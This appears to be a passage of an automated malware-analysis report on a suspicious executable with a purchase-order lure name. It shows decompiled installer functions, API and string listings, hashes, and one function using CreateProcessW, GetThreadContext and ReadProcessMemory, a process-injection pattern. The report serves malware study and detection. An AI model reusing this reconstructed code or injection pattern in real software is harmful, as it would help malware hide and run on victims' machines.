                                                                            • Instruction ID: 9b57ca00f45afa7d873c5e4c93812c2e033b3b55bd6b5381131ee912067d0413
                                                                            • Opcode Fuzzy Hash: 621d8ec26b05587c79b2cea071fc8b0623d7a7a062788e3185bb13ecc113f1ec
                                                                            • Instruction Fuzzy Hash: EA212E32600125EBCF207FA48F49B5F76B0AF50358F20423BF211B62D0CBBC49829A5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405DF0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405DF0(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3ec; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                                            0x00405df4
                                                                            0x00405dfa
                                                                            0x00405dfb
                                                                            0x00405dfb
                                                                            0x00405e00
                                                                            0x00405e01
                                                                            0x00405e04
                                                                            0x00405e0e
                                                                            0x00405e1b
                                                                            0x00405e1e
                                                                            0x00405e26
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405e2a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405e2c
                                                                            0x00000000
                                                                            0x00405e2c
                                                                            0x00000000

                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00405E04
                                                                            • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405E1E
                                                                            Strings
                                                                            • "C:\Users\user\Desktop\PO_29_00412.exe" , xrefs: 00405DF0
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF3
                                                                            • nsa, xrefs: 00405DFB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: "C:\Users\user\Desktop\PO_29_00412.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                            • API String ID: 1716503409-1663213038
                                                                            • Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                                            • Instruction ID: dc9f33b0ddeab6bc99614e691558c60e13527be9603daad3520fecf5624fafc7
                                                                            • Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                                            • Instruction Fuzzy Hash: CAF0A7363042087BDB118F59EC45BDB7B9DDF91750F14C03BFA88DA280D6B0D9988798
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040329A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 94%
                                                                            			E0040329A(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x41f8fc; // 0x2ba3f
				_t34 = _t32 -  *0x40b868 + _a4;
				 *0x424750 = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E00402E52(1);
					return 0;
				}
				E00403419( *0x41f90c);
				SetFilePointer( *0x40a01c,  *0x40b868, 0, 0); // executed
				 *0x41f908 = _t34;
				 *0x41f8f8 = 0;
				while(1) {
					_t10 =  *0x41f900; // 0x33c6d
					_t31 = 0x4000;
					_t11 = _t10 -  *0x41f90c;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E00403403(0x4138f8, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x41f90c =  *0x41f90c + _t31;
					 *0x40b888 = 0x4138f8;
					 *0x40b88c = _t31;
					L6:
					L6:
					if( *0x424754 != 0 &&  *0x424800 == 0) {
						_t19 =  *0x41f908; // 0x26073
						 *0x41f8f8 = _t19 -  *0x41f8fc - _a4 +  *0x40b868;
						E00402E52(0);
					}
					 *0x40b890 = 0x40b8f8;
					 *0x40b894 = 0x8000; // executed
					_t14 = E00406776(0x40b870); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40b890; // 0x40ef51
					_t37 = _t36 - 0x40b8f8;
					if(_t37 == 0) {
						__eflags =  *0x40b88c; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x41f8fc; // 0x2ba3f
						if(_t16 -  *0x40b868 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405E68( *0x40a01c, 0x40b8f8, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40b868 =  *0x40b868 + _t37;
					_t49 =  *0x40b88c; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

















                                                                            0x0040329d
                                                                            0x004032aa
                                                                            0x004032bd
                                                                            0x004032c2
                                                                            0x004033f2
                                                                            0x004033f4
                                                                            0x00000000
                                                                            0x004033fa
                                                                            0x004032ce
                                                                            0x004032e1
                                                                            0x004032e7
                                                                            0x004032ed
                                                                            0x004032f8
                                                                            0x004032f8
                                                                            0x004032fd
                                                                            0x00403302
                                                                            0x0040330a
                                                                            0x0040330c
                                                                            0x0040330c
                                                                            0x00403315
                                                                            0x0040331c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403322
                                                                            0x00403328
                                                                            0x0040332e
                                                                            0x00000000
                                                                            0x00403334
                                                                            0x0040333a
                                                                            0x00403344
                                                                            0x0040335a
                                                                            0x0040335f
                                                                            0x00403364
                                                                            0x0040336a
                                                                            0x00403370
                                                                            0x0040337a
                                                                            0x00403381
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403383
                                                                            0x00403389
                                                                            0x0040338b
                                                                            0x004033ae
                                                                            0x004033b4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004033b6
                                                                            0x004033b8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004033ba
                                                                            0x004033ba
                                                                            0x004033cd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004033dc
                                                                            0x00000000
                                                                            0x004033dc
                                                                            0x00403395
                                                                            0x0040339c
                                                                            0x004033e9
                                                                            0x004033ef
                                                                            0x004033ef
                                                                            0x00000000
                                                                            0x004033ef
                                                                            0x0040339e
                                                                            0x004033a4
                                                                            0x004033aa
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004033ed
                                                                            0x004033ed
                                                                            0x00000000
                                                                            0x004033ed
                                                                            0x00000000

                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 004032AE
                                                                              • Part of subcall function 00403419: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403117,?), ref: 00403427
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004032E1
                                                                            • SetFilePointer.KERNELBASE(0002BA3F,00000000,00000000,004138F8,00004000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000), ref: 004033DC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: FilePointer$CountTick
                                                                            • String ID: Q@
                                                                            • API String ID: 1092082344-2767743040
                                                                            • Opcode ID: 10914339fb078c172392a439e9ed0b3db4c7f76b37a754b5eca90989c3c04b63
                                                                            • Instruction ID: 9f56c4e15643f9c800c1675ca7a95df02ba07fd451ae32c2dc2afdd0933238d4
                                                                            • Opcode Fuzzy Hash: 10914339fb078c172392a439e9ed0b3db4c7f76b37a754b5eca90989c3c04b63
                                                                            • Instruction Fuzzy Hash: E6317A72500216DFD710BF2AEE8496A3BACE740356324C13BE914B22F0CB3899469B9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03110034, Relevance: 6.6, APIs: 4, Instructions: 564processthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 0311039B
                                                                            • GetThreadContext.KERNELBASE(?,00010007), ref: 031103BE
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 031103E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.225530478.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Process$ContextCreateMemoryReadThread
                                                                            • String ID:
                                                                            • API String ID: 2411489757-0
                                                                            • Opcode ID: 8f92a4e5b1fbc3a995a778c2e4d01b83b8f33a7ffd06f7d057336304fe665122
                                                                            • Instruction ID: 18720988107acc491e19376baedec29d03388a081c6c37d3b254153ee2905405
                                                                            • Opcode Fuzzy Hash: 8f92a4e5b1fbc3a995a778c2e4d01b83b8f33a7ffd06f7d057336304fe665122
                                                                            • Instruction Fuzzy Hash: 7F321335E50218EFEB64CBA4DC55BEDB7B5BF08704F2440AAE608FA2A0D7705A90DB15
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 87%
                                                                            			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405C59(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405BEB(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E00405892(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058AF(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405815(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406228("C:\\Users\\hardz\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                                            0x004015bb
                                                                            0x004015c2
                                                                            0x004015c5
                                                                            0x004015ca
                                                                            0x004015ce
                                                                            0x004015d0
                                                                            0x004015d8
                                                                            0x004015da
                                                                            0x004015dc
                                                                            0x004015e0
                                                                            0x004015e3
                                                                            0x004015fb
                                                                            0x004015fc
                                                                            0x004015e5
                                                                            0x004015e5
                                                                            0x004015e8
                                                                            0x00000000
                                                                            0x004015f3
                                                                            0x004015f4
                                                                            0x004015f4
                                                                            0x004015e8
                                                                            0x00401603
                                                                            0x0040160a
                                                                            0x00401617
                                                                            0x00401617
                                                                            0x0040160c
                                                                            0x0040160d
                                                                            0x00401615
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401615
                                                                            0x0040160a
                                                                            0x0040161a
                                                                            0x0040161d
                                                                            0x0040161f
                                                                            0x00401620
                                                                            0x004015d0
                                                                            0x00401627
                                                                            0x00401652
                                                                            0x004022dd
                                                                            0x00401629
                                                                            0x0040162b
                                                                            0x00401636
                                                                            0x0040163c
                                                                            0x00401644
                                                                            0x0040164a
                                                                            0x0040164a
                                                                            0x00401644
                                                                            0x00402a5d
                                                                            0x00402a69

                                                                            APIs
                                                                              • Part of subcall function 00405C59: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,?,00405CC5,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp,74B5FA90,?,74B5F560,00405A10,?,74B5FA90,74B5F560,00000000), ref: 00405C67
                                                                              • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C6C
                                                                              • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C80
                                                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                              • Part of subcall function 00405815: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405858
                                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                            • API String ID: 1892508949-501415292
                                                                            • Opcode ID: 81892e281e0bc41ed8071f99871bb6b4c6bb310ff5ad2bafd743c978d2f7bd36
                                                                            • Instruction ID: 7f8751d3726a152fc7b031c4469f223aff892055c158b12f401dbf96511dfde3
                                                                            • Opcode Fuzzy Hash: 81892e281e0bc41ed8071f99871bb6b4c6bb310ff5ad2bafd743c978d2f7bd36
                                                                            • Instruction Fuzzy Hash: EC112B31208151EBDB307FA54D409BF37B0DA92714B28467FE592B22D3D63D4943962E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406D5A, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 99%
                                                                            			E00406D5A() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004071C8))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
